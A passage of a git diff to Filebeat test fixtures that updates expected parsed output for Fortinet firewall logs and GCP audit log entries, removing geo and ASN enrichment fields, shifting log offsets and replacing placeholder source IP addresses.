-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.8.4.4",
         "destination.port": 443,
         "event.action": "passthrough",
@@ -737,7 +739,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 5598,
+        "log.offset": 5658,
         "message": "Server certificate passed",
         "network.community_id": "1:DPYPEQ6CL+DsivLJV6otkkVV6S8=",
         "network.iana_number": "6",
@@ -772,13 +774,6 @@
     },
     {
         "@timestamp": "2019-05-15T18:03:36.000-02:00",
-        "destination.as.number": 41690,
-        "destination.as.organization.name": "Dailymotion S.A.",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "FR",
-        "destination.geo.country_name": "France",
-        "destination.geo.location.lat": 48.8582,
-        "destination.geo.location.lon": 2.3387,
         "destination.ip": "195.8.215.136",
         "destination.port": 443,
         "event.action": "pass",
@@ -809,7 +804,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 6128,
+        "log.offset": 6188,
         "message": "Web.Client: HTTPS.BROWSER,",
         "network.application": "HTTPS.BROWSER",
         "network.community_id": "1:IOM2CCpAacVSdldWr1f2al8LJv4=",
@@ -881,7 +876,7 @@
         "fortinet.firewall.virusid": "2172",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 6788,
+        "log.offset": 6848,
         "message": "File is infected.",
         "network.community_id": "1:mS2/WPDX46+WauGLEZvCIQ/IKK0=",
         "network.direction": "inbound",
@@ -920,17 +915,7 @@
     },
     {
         "@timestamp": "2019-05-13T16:29:45.000-02:00",
-        "destination.as.number": 42831,
-        "destination.as.organization.name": "UK Dedicated Servers Limited",
         "destination.bytes": 0,
-        "destination.geo.city_name": "Coventry",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 52.382,
-        "destination.geo.location.lon": -1.5874,
-        "destination.geo.region_iso_code": "GB-COV",
-        "destination.geo.region_name": "Coventry",
         "destination.ip": "185.244.31.158",
         "destination.port": 80,
         "event.action": "blocked",
@@ -962,7 +947,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 7596,
+        "log.offset": 7656,
         "message": "URL belongs to a denied category in policy",
         "network.bytes": 84,
         "network.community_id": "1:6Q3s77giRtaDlbjtG7Qfum6LzEk=",
@@ -1034,7 +1019,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 8243,
+        "log.offset": 8303,
         "message": "applications3: Adobe.Flash.newfunction.Handling.Code.Execution,",
         "network.community_id": "1:h1lO9dsjUlBQibNPDwk2LSH5uV4=",
         "network.direction": "inbound",
@@ -1101,7 +1086,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 8980,
+        "log.offset": 9040,
         "message": "anomaly: icmp_flood, 51 > threshold 50",
         "network.community_id": "1:/EwPCnPnhunCBJc8C73Iy8WlrhM=",
         "network.iana_number": "1",
@@ -1126,16 +1111,6 @@
     },
     {
         "@timestamp": "2019-05-15T17:45:30.000-02:00",
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.216.177.83",
         "destination.port": 443,
         "event.action": "block",
@@ -1173,7 +1148,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 9581,
+        "log.offset": 9641,
         "network.community_id": "1:J2etn+6EN21BXHPPJZQeRpj+C3k=",
         "network.direction": "inbound",
         "network.iana_number": "6",
@@ -1236,7 +1211,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 10337,
+        "log.offset": 10397,
         "network.community_id": "1:EfgLxImMmBMDbP6vbTV8jZe5r64=",
         "network.direction": "outbound",
         "network.iana_number": "6",
@@ -1263,15 +1238,6 @@
     },
     {
         "@timestamp": "2019-03-28T10:44:53.000-02:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "104.154.89.105",
         "destination.port": 443,
         "event.action": "blocked",
@@ -1298,7 +1264,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 10760,
+        "log.offset": 10820,
         "message": "Server certificate blocked",
         "network.community_id": "1:3JAdUt0lSMifcZEPoVJn1SC8tdE=",
         "network.iana_number": "6",
@@ -1351,7 +1317,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 11187,
+        "log.offset": 11247,
         "message": "Server certificate blocked",
         "network.community_id": "1:+CuXSKFw5mhoSjpYrUOYxAYOzaU=",
         "network.iana_number": "6",
@@ -1404,7 +1370,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 11615,
+        "log.offset": 11675,
         "message": "Server certificate blocked",
         "network.community_id": "1:xeLbgVy2CNJ3q/bxUWxBBt6cGKM=",
         "network.iana_number": "6",
@@ -1457,7 +1423,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 12037,
+        "log.offset": 12097,
         "message": "Connection is blocked due to unsupported SSL traffic",
         "network.community_id": "1:PohXhOT4cmeI1agRXluSxRuXkvM=",
         "network.iana_number": "6",
@@ -1511,7 +1477,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 12521,
+        "log.offset": 12581,
         "message": "Server certificate blocked",
         "network.community_id": "1:gg6I8tZchtWCopsLdNDN7E84ZbU=",
         "network.iana_number": "6",
@@ -1565,7 +1531,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 12952,
+        "log.offset": 13012,
         "message": "Certificate blacklisted",
         "network.community_id": "1:/tDtPynm8PUjA7+AXhG5maLXczU=",
         "network.iana_number": "6",
@@ -1592,16 +1558,6 @@
     },
     {
         "@timestamp": "2019-03-28T11:06:05.000-02:00",
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "San Jose",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.3388,
-        "destination.geo.location.lon": -121.8914,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "50.18.221.132",
         "destination.port": 443,
         "event.action": "exempt",
@@ -1628,7 +1584,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 13414,
+        "log.offset": 13474,
         "message": "SSL connection exempted",
         "network.community_id": "1:o4PokgFFuw7PzgWghlu55zAVFAQ=",
         "network.iana_number": "6",
@@ -1681,7 +1637,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 13830,
+        "log.offset": 13890,
         "message": "SSL connection exempted",
         "network.community_id": "1:q6lEK+V8YAiHWchN6gVt5i1lbm8=",
         "network.iana_number": "6",
@@ -1708,16 +1664,6 @@
     },
     {
         "@timestamp": "2019-03-28T11:10:55.000-02:00",
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "San Jose",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.3388,
-        "destination.geo.location.lon": -121.8914,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "50.18.221.132",
         "destination.port": 443,
         "event.action": "exempt",
@@ -1744,7 +1690,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 14241,
+        "log.offset": 14301,
         "message": "SSL connection exempted",
         "network.community_id": "1:fc1FAipY32n2Km+Fczx/L3cxBPE=",
         "network.iana_number": "6",
@@ -1799,7 +1745,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 14656,
+        "log.offset": 14716,
         "message": "File was blocked by file filter.",
         "network.direction": "inbound",
         "network.iana_number": "16",
@@ -1826,13 +1772,6 @@
     },
     {
         "@timestamp": "2021-03-30T14:04:58.000+09:00",
-        "destination.as.number": 135161,
-        "destination.as.organization.name": "GMO-Z com NetDesign Holdings Co., Ltd.",
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "SG",
-        "destination.geo.country_name": "Singapore",
-        "destination.geo.location.lat": 1.3667,
-        "destination.geo.location.lon": 103.8,
         "destination.ip": "150.95.25.17",
         "destination.port": 80,
         "event.action": "blocked",
@@ -1869,7 +1808,7 @@
         "fortinet.firewall.virusid": "2172",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 15165,
+        "log.offset": 15225,
         "message": "File is infected.",
         "network.community_id": "1:YYsQyWVI+C/2EYyLGlhTY/RydM8=",
         "network.direction": "inbound",
diff --git a/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log b/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log
index df986980c71b..ab4b30aca34d 100644
--- a/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log
+++ b/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log
@@ -3,8 +3,8 @@
 {"insertId":"yonau2dg2zi","logName":"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"compute.instances.list","resourceAttributes":{"name":"projects/elastic-beats","service":"resourcemanager","type":"resourcemanager.projects"}}],"methodName":"beta.compute.instances.aggregatedList","numResponseItems":"61","request":{"@type":"type.googleapis.com/compute.instances.aggregatedList"},"requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2019-12-19T00:44:25.198Z"}},"response":{"@type":"core.k8s.io/v1.Status","apiVersion":"v1","details":{"group":"batch","kind":"jobs","name":"gsuite-exporter-1589294700","uid":"2beff34a-945f-11ea-bacf-42010a80007f"},"kind":"Status","metadata":{},"status":"Success"},"resourceLocation":{"currentLocations":["global"]},"resourceName":"projects/elastic-beats/global/instances","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2019-12-19T00:44:25.262379373Z","resource":{"labels":{"location":"global","method":"compute.instances.aggregatedList","project_id":"elastic-beats","service":"compute.googleapis.com","version":"beta"},"type":"api"},"severity":"INFO","timestamp":"2019-12-19T00:44:25.051Z"}
 {"insertId":"yonau3dc2zi","logName":"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"permission":"compute.instances.list","resourceAttributes":{"name":"projects/elastic-beats","service":"resourcemanager","type":"resourcemanager.projects"}}],"methodName":"beta.compute.instances.aggregatedList","numResponseItems":"61","request":{"@type":"type.googleapis.com/compute.instances.aggregatedList"},"requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2019-12-19T00:44:25.198Z"}},"resourceLocation":{"currentLocations":["global"]},"resourceName":"projects/elastic-beats/global/instances","serviceName":"compute.googleapis.com","status":{"code":7,"message":"PERMISSION_DENIED"}},"receiveTimestamp":"2019-12-19T00:44:25.262379373Z","resource":{"labels":{"location":"global","method":"compute.instances.aggregatedList","project_id":"elastic-beats","service":"compute.googleapis.com","version":"beta"},"type":"api"},"severity":"INFO","timestamp":"2019-12-19T00:44:25.051Z"}
 {"insertId":"87efd529-6349-45d2-b905-fc607e6c5d3b","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \"cert-manager-webhook:auth-delegator\" of ClusterRole \"system:auth-delegator\" to ServiceAccount \"cert-manager-webhook/cert-manager\""},"logName":"projects/foo/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"5555555-6349-45d2-b905-fc607e6c5d3b","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"system:serviceaccount:cert-manager:cert-manager-webhook"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.authorization.v1beta1.subjectaccessreviews.create","resource":"authorization.k8s.io/v1beta1/subjectaccessreviews"}],"methodName":"io.k8s.authorization.v1beta1.subjectaccessreviews.create","request":{"@type":"authorization.k8s.io/v1beta1.SubjectAccessReview","apiVersion":"authorization.k8s.io/v1beta1","kind":"SubjectAccessReview","metadata":{"creationTimestamp":null},"spec":{"group":["system:serviceaccounts","system:serviceaccounts:kube-system","system:authenticated"],"nonResourceAttributes":{"path":"/apis/webhook.cert-manager.io/v1beta1","verb":"get"},"user":"system:serviceaccount:kube-system:resourcequota-controller"},"status":{"allowed":false}},"requestMetadata":{"callerIp":"10.11.12.13","callerSuppliedUserAgent":"webhook/v0.0.0 (linux/amd64) kubernetes/$Format"},"resourceName":"authorization.k8s.io/v1beta1/subjectaccessreviews","response":{"@type":"authorization.k8s.io/v1beta1.SubjectAccessReview","apiVersion":"authorization.k8s.io/v1beta1","kind":"SubjectAccessReview","metadata":{"creationTimestamp":null},"spec":{"group":["system:serviceaccounts","system:serviceaccounts:kube-system","system:authenticated"],"nonResourceAttributes":{"path":"/apis/webhook.cert-manager.io/v1beta1","verb":"get"},"user":"system:serviceaccount:kube-system:resourcequota-controller"},"status":{"allowed":true,"reason":"RBAC: allowed by ClusterRoleBinding \"system:discovery\" of ClusterRole \"system:discovery\" to Group \"system:authenticated\""}},"serviceName":"k8s.io","status":{"code":0}},"receiveTimestamp":"2020-08-05T21:07:32.157698684Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2020-08-05T21:07:30.974750Z"}
-{"insertId":"v2spcwdzmc2","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"first":true,"id":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"authorizationInfo":[{"granted":true,"permission":"compute.images.create","resourceAttributes":{"name":"projects/foo/global/images/windows-server-2016-v20200805","service":"compute","type":"compute.images"}}],"methodName":"v1.compute.images.insert","request":{"@type":"type.googleapis.com/compute.images.insert","family":"windows-server-2016","guestOsFeatures":[{"type":"VIRTIO_SCSI_MULTIQUEUE"},{"type":"WINDOWS"}],"name":"windows-server-2016-v20200805","rawDisk":{"source":"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz"},"sourceType":"RAW"},"requestMetadata":{"callerIp":"1.2.3.4","callerSuppliedUserAgent":"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2020-08-05T21:59:27.515Z"}},"resourceLocation":{"currentLocations":["eu"]},"resourceName":"projects/foo/global/images/windows-server-2016-v20200805","response":{"@type":"type.googleapis.com/operation","id":"44919313","insertTime":"2020-08-05T14:59:27.259-07:00","name":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","operationType":"insert","progress":"0","selfLink":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e","selfLinkWithId":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320","startTime":"2020-08-05T14:59:27.274-07:00","status":"RUNNING","targetId":"12345","targetLink":"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805","user":"user@mycompany.com"},"serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T21:59:27.822546978Z","resource":{"labels":{"image_id":"771879043","project_id":"foo"},"type":"gce_image"},"severity":"NOTICE","timestamp":"2020-08-05T21:59:26.456Z"}
-{"insertId":"-c7ctxmd2zab","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"id":"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831","last":true,"producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"methodName":"beta.compute.instances.stop","request":{"@type":"type.googleapis.com/compute.instances.stop"},"requestMetadata":{"callerIp":"2.3.4.5","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)"},"resourceName":"projects/foo/zones/us-central1-a/instances/win10-test","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T16:56:41.315135528Z","resource":{"labels":{"instance_id":"590261181","project_id":"foo","zone":"us-central1-a"},"type":"gce_instance"},"severity":"NOTICE","timestamp":"2020-08-05T16:56:40.428Z"}
+{"insertId":"v2spcwdzmc2","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"first":true,"id":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"authorizationInfo":[{"granted":true,"permission":"compute.images.create","resourceAttributes":{"name":"projects/foo/global/images/windows-server-2016-v20200805","service":"compute","type":"compute.images"}}],"methodName":"v1.compute.images.insert","request":{"@type":"type.googleapis.com/compute.images.insert","family":"windows-server-2016","guestOsFeatures":[{"type":"VIRTIO_SCSI_MULTIQUEUE"},{"type":"WINDOWS"}],"name":"windows-server-2016-v20200805","rawDisk":{"source":"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz"},"sourceType":"RAW"},"requestMetadata":{"callerIp":"81.2.69.143","callerSuppliedUserAgent":"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2020-08-05T21:59:27.515Z"}},"resourceLocation":{"currentLocations":["eu"]},"resourceName":"projects/foo/global/images/windows-server-2016-v20200805","response":{"@type":"type.googleapis.com/operation","id":"44919313","insertTime":"2020-08-05T14:59:27.259-07:00","name":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","operationType":"insert","progress":"0","selfLink":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e","selfLinkWithId":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320","startTime":"2020-08-05T14:59:27.274-07:00","status":"RUNNING","targetId":"12345","targetLink":"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805","user":"user@mycompany.com"},"serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T21:59:27.822546978Z","resource":{"labels":{"image_id":"771879043","project_id":"foo"},"type":"gce_image"},"severity":"NOTICE","timestamp":"2020-08-05T21:59:26.456Z"}
+{"insertId":"-c7ctxmd2zab","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"id":"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831","last":true,"producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"methodName":"beta.compute.instances.stop","request":{"@type":"type.googleapis.com/compute.instances.stop"},"requestMetadata":{"callerIp":"67.43.156.12","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)"},"resourceName":"projects/foo/zones/us-central1-a/instances/win10-test","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T16:56:41.315135528Z","resource":{"labels":{"instance_id":"590261181","project_id":"foo","zone":"us-central1-a"},"type":"gce_instance"},"severity":"NOTICE","timestamp":"2020-08-05T16:56:40.428Z"}
 {"insertId":"94170ac4-6e82-4345-98ad-3c780222d19d","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""},"logName":"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"94170ac4-6e82-4345-98ad-3c780222d19d","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.core.v1.nodes.list","resource":"core/v1/nodes"}],"methodName":"io.k8s.core.v1.nodes.list","requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"GoogleCloudConsole"},"resourceName":"core/v1/nodes","serviceName":"k8s.io","status":{}},"receiveTimestamp":"2021-04-23T14:47:31.94822935Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2021-04-23T14:47:07.535383Z"}
 {"insertId":"b10a904a-faa4-4e0d-9ec3-7bc6a180196a","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"","k8s.io/deprecated":"true","k8s.io/removed-release":"1.22"},"logName":"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"b10a904a-faa4-4e0d-9ec3-7bc6a180196a","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.extensions.v1beta1.ingresses.list","resource":"extensions/v1beta1/namespaces/cos-auditd/ingresses"}],"methodName":"io.k8s.extensions.v1beta1.ingresses.list","requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"GoogleCloudConsole"},"resourceName":"extensions/v1beta1/namespaces/cos-auditd/ingresses","serviceName":"k8s.io","status":{}},"receiveTimestamp":"2021-04-23T14:16:36.37362467Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2021-04-23T14:16:07.574776Z"}
 {"insertId":"e973134d-b4d5-4e2f-92b8-82bba13fdb92","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \"system:public-info-viewer\" of ClusterRole \"system:public-info-viewer\" to Group \"system:unauthenticated\""},"logName":"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"e973134d-b4d5-4e2f-92b8-82bba13fdb92","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"system:anonymous"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.get","resource":"readyz"}],"methodName":"io.k8s.get","requestMetadata":{"callerIp":"127.0.0.1","callerSuppliedUserAgent":"kube-probe/1.19+"},"resourceName":"readyz","serviceName":"k8s.io","status":{}},"receiveTimestamp":"2021-04-29T08:19:21.606980385Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2021-04-29T08:19:20.80581Z"}
diff --git a/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json b/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json
index a25ec4fb1f3a..7e0a4d7f7dae 100644
--- a/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json
+++ b/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json
@@ -268,7 +268,7 @@
         "gcp.audit.method_name": "v1.compute.images.insert",
         "gcp.audit.request.name": "windows-server-2016-v20200805",
         "gcp.audit.request.proto_name": "type.googleapis.com/compute.images.insert",
-        "gcp.audit.request_metadata.caller_ip": "1.2.3.4",
+        "gcp.audit.request_metadata.caller_ip": "81.2.69.143",
         "gcp.audit.request_metadata.caller_supplied_user_agent": "google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)",
         "gcp.audit.resource_location.current_locations": [
             "eu"
@@ -283,15 +283,15 @@
         "log.offset": 7530,
         "service.name": "compute.googleapis.com",
         "service.type": "gcp",
-        "source.geo.city_name": "Moscow",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RU",
-        "source.geo.country_name": "Russia",
-        "source.geo.location.lat": 55.7527,
-        "source.geo.location.lon": 37.6172,
-        "source.geo.region_iso_code": "RU-MOW",
-        "source.geo.region_name": "Moscow",
-        "source.ip": "1.2.3.4",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -317,27 +317,23 @@
         "gcp.audit.authentication_info.principal_email": "user@mycompany.com",
         "gcp.audit.method_name": "beta.compute.instances.stop",
         "gcp.audit.request.proto_name": "type.googleapis.com/compute.instances.stop",
-        "gcp.audit.request_metadata.caller_ip": "2.3.4.5",
+        "gcp.audit.request_metadata.caller_ip": "67.43.156.12",
         "gcp.audit.request_metadata.caller_supplied_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)",
         "gcp.audit.resource_name": "projects/foo/zones/us-central1-a/instances/win10-test",
         "gcp.audit.service_name": "compute.googleapis.com",
         "gcp.audit.type": "type.googleapis.com/google.cloud.audit.AuditLog",
         "input.type": "log",
         "log.logger": "projects/foo/logs/cloudaudit.googleapis.com%2Factivity",
-        "log.offset": 9946,
+        "log.offset": 9950,
         "service.name": "compute.googleapis.com",
         "service.type": "gcp",
-        "source.as.number": 3215,
-        "source.as.organization.name": "Orange",
-        "source.geo.city_name": "Clermont-Ferrand",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "FR",
-        "source.geo.country_name": "France",
-        "source.geo.location.lat": 45.7838,
-        "source.geo.location.lon": 3.0966,
-        "source.geo.region_iso_code": "FR-63",
-        "source.geo.region_name": "Puy-de-D\u00f4me",
-        "source.ip": "2.3.4.5",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "forwarded"
         ],
@@ -376,7 +372,7 @@
         "gcp.audit.type": "type.googleapis.com/google.cloud.audit.AuditLog",
         "input.type": "log",
         "log.logger": "projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access",
-        "log.offset": 10917,
+        "log.offset": 10926,
         "orchestrator.api_version": "v1",
         "orchestrator.cluster.name": "analysis-cluster",
         "orchestrator.resource.type": "nodes",
@@ -418,7 +414,7 @@
         "gcp.audit.type": "type.googleapis.com/google.cloud.audit.AuditLog",
         "input.type": "log",
         "log.logger": "projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access",
-        "log.offset": 11897,
+        "log.offset": 11906,
         "orchestrator.api_version": "v1beta1",
         "orchestrator.cluster.name": "analysis-cluster",
         "orchestrator.namespace": "cos-auditd",
@@ -461,7 +457,7 @@
         "gcp.audit.type": "type.googleapis.com/google.cloud.audit.AuditLog",
         "input.type": "log",
         "log.logger": "projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access",
